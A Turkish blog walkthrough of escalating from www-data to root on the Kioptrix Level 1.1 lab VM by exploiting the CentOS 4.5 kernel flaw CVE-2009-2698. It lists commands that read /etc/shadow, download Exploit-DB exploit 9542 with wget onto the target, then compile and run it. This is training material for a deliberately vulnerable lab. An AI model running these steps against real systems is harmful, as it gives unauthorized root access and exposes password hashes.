CentOS 4.5 – Linux Kernel 2.6.9.55 İşletim Sistemindeki Hak Yükseltme Zafiyetinin (ip_append_data()) İstismar Edilerek root Yetkileri ile Komut Satırının Elde Edilmesi

Linux sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, Linux Kernel 2.6.9-55 çekirdeğine ve CentOS 4.5 işletim sistemine sahip Kioptrix: Seviye – 1.1 (#2) sanal makinesi üzerinde çalışan bir zafiyet (CVE-2009-2698) istismar edilerek standart kullanıcı haklarından “root” kullanıcısı hakkı ile komut satırı / kabuk elde edilecektir.

Yazıda kullanılan Kioptrix: Seviye – 1.1 (#2) sanal makinesi Vulnhub sitesinden indirilebilir.

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Linux işletim sistemine standart yetkilerle elde edilen erişimde uygulama kullanıcısı (www-data) haklarına sahip olunduğu görülmektedir.

id
head -3 /etc/passwd
head -3 /etc/shadow

 

İşletim sisteminin sürüm bilgilerine bakıldığında Centos 4.5 kullanıldığı ve Linux çekirdek sürümünün 2.6.9-55 olduğu görülmektedir.

uname -a
cat /etc/redhat-release

 

Linux Kernel 2.6.9-55’te birçok kritik zafiyet bulunmaktadır.

searchsploit Linux Kernel -t 2.6.| grep -v “/dos/”

 

Bu zafiyete ait istismar kodlarının en önemlilerinden biri de Exploit-db’de 9542 numaralı istismar kodudur.

 

CVE-2009-2698 ID’li bu zafiyet UDP implementasyonundan kaynaklanmaktadır. Bu zafiyet ile Linux’un 2.6.19 sürümünden daha eski çekirdeklerde udp_sendmsg fonksiyonu istismar edilebilemekte ve hak yükseltilebilmektedir.

https://www.exploit-db.com/exploits/9542/
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) – ‘ip_append_data()’ Ring0 Privilege Escalation (1)

 

Hedef sisteme bu dosya indirilir ve bu dosyanın C dosya tipinde olduğu görülür.

pwd
ls
wget https://www.exploit-db.com/download/9542 –no-check-certificate -O IstismarKaynakKodu.c
ls -la

 

İstismar kodu derlenir.

gcc IstismarKaynakKodu.c -o HakYukseltme
ls -la

 

Sonrasında çalıştırılır ve “root” yetkilerine erişim sağlanılmış olur.

./HakYukseltme
id
head -3 /etc/shadow

 

Kaynak:

https://jhalon.github.io/vulnhub-kioptrix2/
https://kongwenbin.wordpress.com/2016/10/29/writeup-for-kioptrix-level-1-1-2/

 

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.